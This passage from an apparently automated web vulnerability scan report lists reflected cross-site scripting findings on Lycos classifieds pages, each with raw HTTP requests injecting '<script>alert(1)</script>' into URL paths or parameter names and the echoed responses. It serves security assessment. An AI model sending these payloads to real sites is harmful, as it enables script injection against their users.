Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-entertainment-cateringe23a3"><script>alert(1)</script>da19991cd03/?mobile=1" rel="nofollow">
...[SNIP]...

1.189. http://classifieds.lycos.com/service-entertainment-catering/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-entertainment-catering/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29655"><script>alert(1)</script>fa8ef175739 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-entertainment-catering/?29655"><script>alert(1)</script>fa8ef175739=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:21 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24699

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-entertainment-catering/?29655"><script>alert(1)</script>fa8ef175739=1&mobile=1" rel="nofollow">
...[SNIP]...

1.190. http://classifieds.lycos.com/service-health/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-health/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 849a4"><script>alert(1)</script>c69ed26e79e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-health849a4"><script>alert(1)</script>c69ed26e79e/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:19:10 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:10 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-health849a4"><script>alert(1)</script>c69ed26e79e/?mobile=1" rel="nofollow">
...[SNIP]...

1.191. http://classifieds.lycos.com/service-health/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-health/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69242"><script>alert(1)</script>2ee2fffe34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-health/?69242"><script>alert(1)</script>2ee2fffe34=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37596

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-health/?69242"><script>alert(1)</script>2ee2fffe34=1&mobile=1" rel="nofollow">
...[SNIP]...

1.192. http://classifieds.lycos.com/service-home-appliance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-home-appliance/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a035"><script>alert(1)</script>04bdf3b806 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-home-appliance3a035"><script>alert(1)</script>04bdf3b806/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-home-appliance3a035"><script>alert(1)</script>04bdf3b806/?mobile=1" rel="nofollow">
...[SNIP]...

1.193. http://classifieds.lycos.com/service-home-appliance/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-home-appliance/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7003d"><script>alert(1)</script>d18f4482797 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-home-appliance/?7003d"><script>alert(1)</script>d18f4482797=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:29 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-home-appliance/?7003d"><script>alert(1)</script>d18f4482797=1&mobile=1" rel="nofollow">
...[SNIP]...

1.194. http://classifieds.lycos.com/service-home-plumbing/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-home-plumbing/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d827"><script>alert(1)</script>3238fd8a0cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-home-plumbing4d827"><script>alert(1)</script>3238fd8a0cb/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:17:46 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:17:46 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-home-plumbing4d827"><script>alert(1)</script>3238fd8a0cb/?mobile=1" rel="nofollow">
...[SNIP]...

1.195. http://classifieds.lycos.com/service-home-plumbing/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-home-plumbing/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88064"><script>alert(1)</script>504679c49e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-home-plumbing/?88064"><script>alert(1)</script>504679c49e6=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:17:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:17:06 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 34189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-home-plumbing/?88064"><script>alert(1)</script>504679c49e6=1&mobile=1" rel="nofollow">
...[SNIP]...

1.196. http://classifieds.lycos.com/service-lawn/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-lawn/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b410"><script>alert(1)</script>a4e52787ed3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-lawn8b410"><script>alert(1)</script>a4e52787ed3/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:18:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:28 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-lawn8b410"><script>alert(1)</script>a4e52787ed3/?mobile=1" rel="nofollow">
...[SNIP]...

1.197. http://classifieds.lycos.com/service-lawn/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-lawn/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77998"><script>alert(1)</script>8ee624a3fb9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-lawn/?77998"><script>alert(1)</script>8ee624a3fb9=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:17:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:17:35 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-lawn/?77998"><script>alert(1)</script>8ee624a3fb9=1&mobile=1" rel="nofollow">
...[SNIP]...

1.198. http://classifieds.lycos.com/service-move/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-move/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57d23"><script>alert(1)</script>67fb0a91376 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-move57d23"><script>alert(1)</script>67fb0a91376/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:18:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:57 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-move57d23"><script>alert(1)</script>67fb0a91376/?mobile=1" rel="nofollow">
...[SNIP]...

1.199. http://classifieds.lycos.com/service-move/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-move/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c638e"><script>alert(1)</script>32bb36ba6df was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-move/?c638e"><script>alert(1)</script>32bb36ba6df=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:18:00 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:00 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 37365

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-move/?c638e"><script>alert(1)</script>32bb36ba6df=1&mobile=1" rel="nofollow">
...[SNIP]...

1.200. http://classifieds.lycos.com/service-pet-grooming/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-grooming/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5587"><script>alert(1)</script>05047fa2e57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-groomingb5587"><script>alert(1)</script>05047fa2e57/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:13:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:13:17 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-groomingb5587"><script>alert(1)</script>05047fa2e57/?mobile=1" rel="nofollow">
...[SNIP]...

1.201. http://classifieds.lycos.com/service-pet-grooming/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-grooming/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60266"><script>alert(1)</script>3c094c78936 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-grooming/?60266"><script>alert(1)</script>3c094c78936=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:12:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:12:42 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-grooming/?60266"><script>alert(1)</script>3c094c78936=1&mobile=1" rel="nofollow">
...[SNIP]...

1.202. http://classifieds.lycos.com/service-pet-sitter/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-sitter/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9635"><script>alert(1)</script>e217af7b012 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-sitterd9635"><script>alert(1)</script>e217af7b012/ HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 404 Not Found
Date: Mon, 07 Feb 2011 15:53:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:34 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-sitterd9635"><script>alert(1)</script>e217af7b012/?mobile=1" rel="nofollow">
...[SNIP]...

1.203. http://classifieds.lycos.com/service-pet-sitter/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-sitter/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a172"><script>alert(1)</script>25b1903d5f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service-pet-sitter/?9a172"><script>alert(1)</script>25b1903d5f4=1 HTTP/1.1
Host: classifieds.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 15:53:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:53:24 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/service-pet-sitter/?9a172"><script>alert(1)</script>25b1903d5f4=1&mobile=1" rel="nofollow">
...[SNIP]...

1.204. http://classifieds.lycos.com/service-pet-veterinarian/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://classifieds.lycos.com
Path:   /service-pet-veterinarian/

Issue detail

